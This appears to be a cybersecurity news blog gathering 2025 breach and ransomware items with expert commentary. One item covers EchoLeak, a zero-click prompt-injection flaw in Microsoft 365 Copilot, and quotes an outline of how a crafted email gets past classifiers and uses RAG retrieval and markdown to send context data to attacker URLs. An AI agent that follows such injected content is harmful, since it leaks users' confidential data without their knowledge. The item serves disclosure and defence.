The IT Nerd

This morning, ransomware gang DragonForce uploaded Strafford County, NH, to its data leak site, giving the US government entity just five days to meet its ransom demands before 830.03 GB of data is leaked.

In a blog post today, Rebecca Moody, Head of Data Research at Comparitech, commented:

“DragonForce gained notoriety this year after it attacked three UK retailers–Marks & Spencer, Co-op, and Harrods. Its attack on Marks & Spencer was particularly disruptive and is expected to cost the company around $400 million.”

“So far this year, DragonForce has claimed 66 attacks with eight of these being confirmed by the entity involved. Other DragonForce victims from previous years are still being confirmed, too, with one of the latest being IT services firm, GeoLogics Corporation. At the end of May 2025, it began notifying nearly 12,000 of a breach that stemmed from a cyber attack way back in December 2023. Here, DragonForce alleged to have stolen nearly 123 GB of data.”

“DragonForce operates a ransomware-as-a-service business whereby affiliates use its malware to encrypt systems and take a percentage of the ransom payments in return. Like most gangs today, DragonForce employs a double-extortion tactic where it demands two ransoms: one to decrypt systems and another to delete stolen data. Throughout 2025, we’ve tracked 30 confirmed attacks on US government entities and are monitoring a further 31 unconfirmed.”

One thing to keep in mind is that even if they pay the ransom, there’s zero guarantee that data will be deleted and said data won’t be leaked anyway. That’s why preventing the bad guys from getting to the point of holding your data for ransom is critical.

Zoomcar Holdings, a peer-to-peer car-sharing marketplace, has disclosed that unauthorized accessed its system led to a data breach impacting 8.4 million users.

On June 9, 2025, Zoomcar Holdings, Inc. (the “Company”) identified a cybersecurity incident involving unauthorized access to its information systems. The Company became aware of the incident after certain employees received external communications from a threat actor alleging unauthorized access to Company data. Upon discovery, the Company promptly activated its incident response plan.

Based on preliminary findings, the Company determined that an unauthorized third party accessed a limited dataset containing certain personal information of a subset of approximately 8.4 million users, including names, phone numbers, car registration numbers, personal addresses and email addresses associated with such users. At this time, there is no evidence that financial information, plaintext passwords, or other sensitive identifiers were compromised.

In response to the incident, the Company has taken immediate actions to contain the threat and enhance its security posture. These measures include implementing additional safeguards across the cloud and internal network, increasing system monitoring, and reviewing access controls. The Company is also engaging with third-party cybersecurity experts to further assist with the investigation. The Company has also notified the appropriate regulatory and law enforcement authorities and is cooperating fully with their inquiries.

To date, the incident has not resulted in any material disruption to the Company’s operations. However, the Company continues to evaluate the scope and potential impacts of the event, including legal, financial, and reputational considerations, as well as any associated remediation costs.

Paul Bischoff, Consumer Privacy Advocate at Comparitech: 

“Although this was a large breach, the information compromised does not pose a direct threat to victims’ accounts or finances. Victims should be on the lookout for targeted phishing messages and scams via text and email. Those messages might pretend to be from Zoomcar or a related company. Never click on links or attachments in unsolicited emails and texts.”

Chris Hauk, Consumer Privacy Champion at Pixel Privacy:

“First of all, bravo to Zoomcar for quickly alerting the public to the breach. Luckily, no credit card, debit card, or other financial information was exposed in the breach. However, Zoomcar customers do need to stay alert for any attempts to open new accounts in their name and to especially stay alert for phishing attempts where bad actors use the information they were able to obtain to pry more information from customers that can be used to breach accounts.”

Roger Grimes, Data-Driven Defense Evangelist at KnowBe4:

“Everyone’s information, including the information taken by the Zoomcar theft, has been stolen multiple times over the years. I’m not sure how valuable it is to cybercriminals in either use or in selling, but the top risk scenario is some sort of phishing scam where someone fraudulently posing as Zoomcar tries to use the potential victim’s relationship with Zoomcar as a means to further compromise the victim. And for sure, scammers with information like that are more likely to be successful than with just sending out a generic phish with no “insider information.” Zoomcar customers need to pay attention to the breach announcement and use increased caution anytime someone supposedly from Zoomcar reaches out to them. History is replete with previous examples of compromised information being used to successfully phish the involved customers at a later date.”

Another day, another breach that may affect millions. Welcome to the new normal where some company getting pwned will result eventually in something bad happening to you. That’s not good and seriously needs to change.

But at least Zoomcar admitted to it quickly….. I guess.

It is being reported that a cyberattack on the Washington Post compromised the email accounts of several journalists and was potentially the work of a foreign government

Bleeping Computer has more details: Washington Post’s email system hacked, journalists’ accounts compromised

Roger Grimes, data-driven defense evangelist at cybersecurity company KnowBe4, commented:

 “Attacks against journalists are a serious problem. In most cases, the journalist has to click on a rogue link and somehow get tricked into running the malware. However, there are many commercial surveillance vendors (CSVs) with many zero-days that require zero clicks by the targeted journalist. This is a very serious problem and the cybersecurity world is trying to come to grips with how to treat CSVs who create and deploy zero-click zero-days. It’s a real problem that our industry is just starting to try and grapple with. It’s not helped when different governments, even our own government and its allies, also use these services. When they do, it’s harder to say do as I say but not as I do.”

I have the feeling that this will not be the last time that we will see a headline like this. Threat actors, especially nation state backed threat actors will see this as open season on journalists and you’ll see other high profile journalists, who are already targets for hacks, targeted even more.

UPDATE: Paul Bischoff, Consumer Privacy Advocate at Comparitech had this to say: 

“Unauthorized access to reporters’ emails could put journalists and their sources at risk. It could also allow attackers to hack into other accounts registered to the email address. I hope the Washington Post works as quickly as possible to notify sources and other data subjects who might be affected so they can take steps to protect themselves.”

Chris Hauk, Consumer Privacy Champion at Pixel Privacy follows with this:

“Currently, it appears that only emails were compromised. HOWEVER, MANY Microsoft accounts also use OneDrive cloud storage, which usually use the same credentials, so we could find out that files stored in the cloud could also have been compromised. Luckily, the Post employees use Slack in place of email to communicate, as well as the encrypted Signal for messaging. Hopefully this has also helped keep the damage minimal.”

Medical software company Episource this week began notifying victims of a January 2025 data breach that compromised medical records and health insurance info. Sharp Healthcare, an Episource client in California, is also notifying patients of the breach. Episource has not disclosed how many victims it notified nationwide, but the Texas Attorney General reports 24,259 people were notified of the breach in that state alone.

In a blog post reporting this news, Paul Bischoff, Consumer Privacy Advocate at Comparitech, wrote:

“In 2025 to date, Comparitech has logged three confirmed ransomware attacks on US healthcare-related businesses that do not provide direct care to patients. Attacks on these companies can have far-reaching consequences for hospitals, clinics, and other direct care providers that use them. Last year, 29 such attacks compromised nearly 193 million records. Ransomware gangs in 2025 so far have made another 24 unconfirmed attack claims against healthcare-related companies that haven’t been publicly acknowledged by the targeted companies.”

“As for direct care providers like hospitals and clinics, Comparitech researchers have logged 27 confirmed ransomware attacks in 2025 so far, compromising more than 1.9 million records. Ransomware attacks on healthcare providers can cripple critical systems and endanger the health, privacy, and security of patients. Targeted companies must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk of fraud. Hospitals and clinics might have to resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.”

Yet again I am reporting on another health care breach. That’s continues not to be a good thing as it underscores how vulnerable this space is. Changing this in a different direction has to be a priority.

Researchers have discovered the first zero-click AI vulnerability dubbed “EchoLeak” that allows attackers to automatically exfiltrate sensitive and proprietary information from M365 Copilot context, without the user’s awareness, or relying on any specific victim behavior. Termed “LLM Scope Violation,” the new exploitation may have additional manifestations in other RAG-based chatbots and AI agents representing a major discovery advancement in how threat actors can attack AI agents – by leveraging internal model mechanics.

More details here:  https://www.aim.security/lp/aim-labs-echoleak-blogpost

Ensar Seker, CISO at SOCRadar had this to say:

“The EchoLeak discovery by Aim Labs exposes a critical shift in cybersecurity risk, highlighting how even well-guarded AI agents like Microsoft 365 Copilot can be weaponized through what Aim Labs correctly terms an “LLM Scope Violation.” This attack, which allows zero-click data exfiltration from an AI assistant’s context simply by sending an email, breaks from traditional breach tactics as it doesn’t require any user action beyond receiving mail. The fact that it bypasses server-side classifiers and markdown redaction rules demonstrates how these vulnerabilities are baked into agent-level logic, not just surface UI flows. 

“This has serious implications for NATO, government, defense, healthcare, and anyone using enterprise AI assistants: attackers no longer need to compromise user credentials or rely on phishing. They can manipulate a trusted AI interface directly. The multi-step EchoLeak chain is both elegant and insidious: it leverages retrieval-augmented generation (RAG), content-security-policy quirks, and markdown behavior to funnel data out silently to attacker-controlled URLs. 

“What stands out especially is that this isn’t limited to Copilot. As Aim Labs warns, any RAG-based agent that processes untrusted inputs alongside internal data is vulnerable to scope violations. This signals a broader architectural flaw across the AI assistant space – one that demands runtime guardrails, stricter input scoping, and inflexible separation between trusted and untrusted content.

“Organizations deploying AI agents must act quickly: disable external email ingestion in Copilot, enforce DLP tags, and apply prompt-level filters that block structured output or suspicious links. They should also treat every AI deployment with the same scrutiny reserved for enterprise applications integrating AI-specific security controls into DevSecOps and threat modeling. Insecure guards at the model layer are now as critical a risk as insecure interfaces at the network layer.

“EchoLeak is a watershed moment. It shows that AI agents can be their own attackers, and secure-by-design principles must evolve just as AI shifts from assistant to agent.”

Well, this isn’t good given the fact that AI is being deployed everywhere for everything. I think it’s a safe bet that we’ll be seeing more of this type of exploit going forward, and the danger of these sorts of exploits will only quickly increase.

Warlock, a new ransomware gang, today claimed credit for a spate of cyber-attacks that hit several government agencies from around the world. The group claimed responsibility for 16 cyber-attacks in the past month, and about half those hit government agencies and departments. 

In a blog post reporting this news, Paul Bischoff, Consumer Privacy Advocate at Comparitech, wrote:

“Also known as Warlock Dark Army, Warlock is a newer ransomware strain operated by cybercriminals. Once infected, Warlock encrypts data to make it inaccessible, then demands a ransom for the decryption key. It also steals data that it can use to extort targets by threatening to release private information.”

“Warlock could be connected to another ransomware group called Black Basta, which stopped claiming new attacks in January 2025. Warlock took credit for two attacks that Black Basta previously claimed against Arch-Con Corporation and Lactanet.”

“Comparitech researchers have tracked 79 confirmed ransomware attacks on government entities worldwide in 2025 to date. In 2024, we logged 199 such attacks in total. The average ransom demand is just over $2.4 million.”

“Ransomware attacks on government agencies and departments can both steal data and lock down computer systems. The attacker then demands a ransom to delete the stolen data and in exchange for a key to recover infected systems. If the target doesn’t pay, it could take weeks or even months to restore systems, data could be lost forever, and people whose data was stolen are put at greater risk of fraud.”

My stories on ransomware gangs never seem to end. I say that because I just finished writing about these guys, and now there’s a new gang on the block. This illustrates how out of control ransomware is and why urgent action is needed to get things in a better place.

Dermatologists of Birmingham this week confirmed it notified 86,414 people of a March 2025 data breach that compromised the following personal info:

• Names
• Social Security numbers
• Addresses
• Email addresses
• Phone numbers
• Dates of birth
• Medical diagnoses and treatments
• Health insurance info

Ransomware gang Qilin claimed responsibility for the attack, saying it stole 141 GB of data from the Alabama skin care practice, however the company has not verified Qilin’s claim.

In a blog post reporting this news, Paul Bischoff, Consumer Privacy Advocate at Comparitech, wrote:

“Qilin is a ransomware gang that began claiming responsibility for attacks on its data leak site in late 2022. Based in Russia, Qilin mainly targets victims through phishing emails to spread its ransomware. It launched in August 2022 and runs a ransomware-as-a-service business in which affiliates pay to use Qilin’s malware to launch attacks and collect ransoms.”

“Qilin took credit for 31 confirmed ransomware attacks in 2025 to date, plus 221 unconfirmed attack claims that haven’t been acknowledged by the targeted organizations. Hospitals and clinics are frequent targets for Qilin and other ransomware gangs. Last week, Next Step Healthcare confirmed it notified more than 12,000 people of a June 2024 data breach claimed by Qilin. The group also recently took credit for confirmed attacks on a hospital in Spain and an eye surgeon in Hungary.”

“Comparitech researchers have logged 27 confirmed ransomware attacks on US healthcare companies in 2025 so far, compromising more than 1.9 million records. Ransomware attacks on US hospitals, clinics, and other care providers can cripple critical systems and endanger the health, privacy, and security of patients. Hospitals must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk of fraud. Hospitals and clinics might have to resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.”

Qilin is on a rampage as there’s this example, this example, this example, this example, this example, this example, this example, and this example. That’s a lot and it shows how dangerous this ransomware gang is. So organizations should consider themselves warned and take whatever measures are required to avoid being pwned by them.

Researchers have uncovered a novel twist to employment scams in which hackers, in this case FIN6 (aka “Skeleton Spider”), impersonate job seekers with fake resumes to lure recruiters rather than posing as recruiters to lure job applicants.

By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. More details can be found here:

 https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/

Erich Kron, security awareness advocate at KnowBe4, commented:

“This is an interesting twist to the common recruiting scam and is especially dangerous because the attackers take time to build a rapport with the recruiter before springing the trap. It’s wise to be suspicious of email or text messages that are unsolicited or unexpected, but in this case, the recruiters do expect to receive correspondence and documents, and the back-and-forth conversation builds the trust the attackers need to execute the malware.

“In any organization, there are going to be departments that deal with outside communications, and these departments should be trained and educated about how to handle potentially dangerous attachments or links. It’s also good to remind employees not to let their guard down as they get comfortable in a conversation.”

Threat actors are getting more and more crafty. That means you have to get more and more suspicious of anything and everything that hits your inbox to avoid something really bad happening to you.

Optima Tax Relief was hit by a ransomware attack by Chaos group threat actors who are now leaking 69 GB of data stolen from the company. Bleeping Computer has details:

Today, the Chaos ransomware gang added Optima Tax Relief to its data leak site, claiming to have stolen 69 GB of data. 

This data contains what appears to be corporate data and customer case files. Tax documents commonly contain sensitive personal information, such as Social Security numbers, phone numbers, and home addresses, which can be used for malicious activity by other threat actors or identity theft.

Sources with knowledge of the attack told BleepingComputer that this was a double-extortion attack, with the threat actors not only stealing data from the company but also encrypting servers.

Ensar Seker, CISO at SOCRadar:

“The Optima Tax Relief breach underscores the growing interest of ransomware groups like Chaos in targeting high-trust financial service providers that handle sensitive personal data. This isn’t just a business disruption issue, it’s a national identity risk.

Tax resolution firms like Optima are rich targets because they aggregate the full spectrum of personally identifiable information (PII): Social Security numbers, tax documents, financial disclosures, and often even power-of-attorney authorization records. When exfiltrated, this data doesn’t just enable identity theft, it fuels secondary fraud operations for years.

“The fact that this was a double-extortion attack, involving both encryption and data theft, is unfortunately now the standard playbook. What’s more concerning is that Chaos ransomware has only recently emerged, yet already demonstrates the operational maturity of a seasoned group. Their ability to launch effective attacks and publicize breaches so quickly suggests they’re leveraging pre-existing access-as-a-service networks or recycled stealer logs for rapid compromise.

“From a defender’s standpoint, this is a call to action: Organizations that handle financial or tax data need to treat endpoint telemetry, privileged access management, and data exfiltration detection as minimum baselines. And more broadly, this reinforces the importance of having not only an incident response plan but a breach communications plan tailored for sensitive customer-impact scenarios.”

Erich Kron, Security Awareness Advocate at KnowBe4:

“The Chaos ransomware group is fairly new on the scene but has claimed a few victims already. This victim is an interesting one due to the significant amount and types of data that were collected and likely stolen. The customers will have provided not only Social Security numbers and other personal information, but also a lot of personal and sensitive financial information that may be embarrassing and that they may not want to be made public. The type of information stolen could also be used by social engineers to convince victims that they are from Optima and may lead to future scams and financial losses.

“The specific attack vector has not been released, but generally speaking, ransomware is most often spread through attacks on the humans within organizations, such as email phishing, vishing, or smishing. For this reason it is very important for organizations to have a robust and well-planned human risk management (HRM) program in place.”

This is an attack that will not end well. Not for Optima, and not for their customers. Expect this hack to reverberate for months or longer.

United Natural Foods (UNFI), North America’s largest publicly traded wholesale distributor, was forced to shut down some systems following a recent cyberattack. The Rhode Island-based company operates 53 distribution centers and delivers fresh and frozen products to over 30,000 locations across the United States and Canada:

On June 5, 2025, United Natural Foods, Inc. (the “Company”) became aware of unauthorized activity on certain of its Information Technology (IT) systems. The Company promptly activated its incident response plan and implemented containment measures, including proactively taking certain systems offline, which has temporarily impacted the Company’s ability to fulfill and distribute customer orders. The incident has caused, and is expected to continue to cause, temporary disruptions to the Company’s business operations. The Company is working actively to assess, mitigate, and remediate the incident with the assistance of third-party cybersecurity professionals and has notified law enforcement. Pursuant to its business continuity plans, the Company has implemented workarounds for certain operations in order to continue servicing its customers where possible. The Company is continuing to work to restore its systems to safely bring them back online.

The investigation to assess the impact and scope of the incident remains ongoing and is in its early stages.

Erich Kron, Security Awareness Advocate at KnowBe4: 

“Operations such as this often work on a very tight timeline, so the pressure can be high to get systems up and running as soon as possible. This is what attackers hope for as they dangle the idea in front of the victims that paying the ransom will get organizations back online quickly. While decrypting the data could possibly restore operations more quickly, there is a huge danger that back doors are left in place to be exploited again, or that after payment, encrypted files turn out to be corrupted and unrecoverable.”

“Not only do attacks such as these really put the pressure on the victim, but the organizations that rely on the products are also put in a spot as well. If the wholesaler can’t get items to the retailer, the retailer suffers greatly as well and might look for other options to make future purchases, costing the wholesaler customers and their reputation.”

“Since the vast majority of ransomware attacks are started by exploiting employees, organizations should have a robust human risk management program in place to address threats such as social engineering, poor credential hygiene, and other human-centric threats.”

Paul Bischoff, Consumer Privacy Advocate at Comparitech: 

“Although UNFI hasn’t stated as much, this attack has all the hallmarks of ransomware. Ransomware attacks can lock down computer systems, forcing companies to pay a ransom or face extended downtime and permanent data loss. These attacks can cripple companies and even force them to shut down permanently in some cases, so they should not be taken lightly. This attack could have knock-on effects including higher food prices for consumers.”

Chris Hauk, Consumer Privacy Champion at Pixel Privacy:

“Cyberattacks like the one UNFI has been hit with can cause delays in deliveries, product shortages, and even store closings and temporary layoffs, due to organizations’ reliance on computer systems. While we don’t know exactly what type of attack has been launched against UNFI or how it was launched, it does emphasize how companies need to ensure that their internal systems, as well as those of their suppliers and partners, are kept up to date to plug security holes.”

I for one would would like to see more details disclosed. As in what happened, what the downstream effects are, and what UNFI will do to ensure that it doesn’t happen again. Because that will enable it’s business partners and the public to trust them going forward.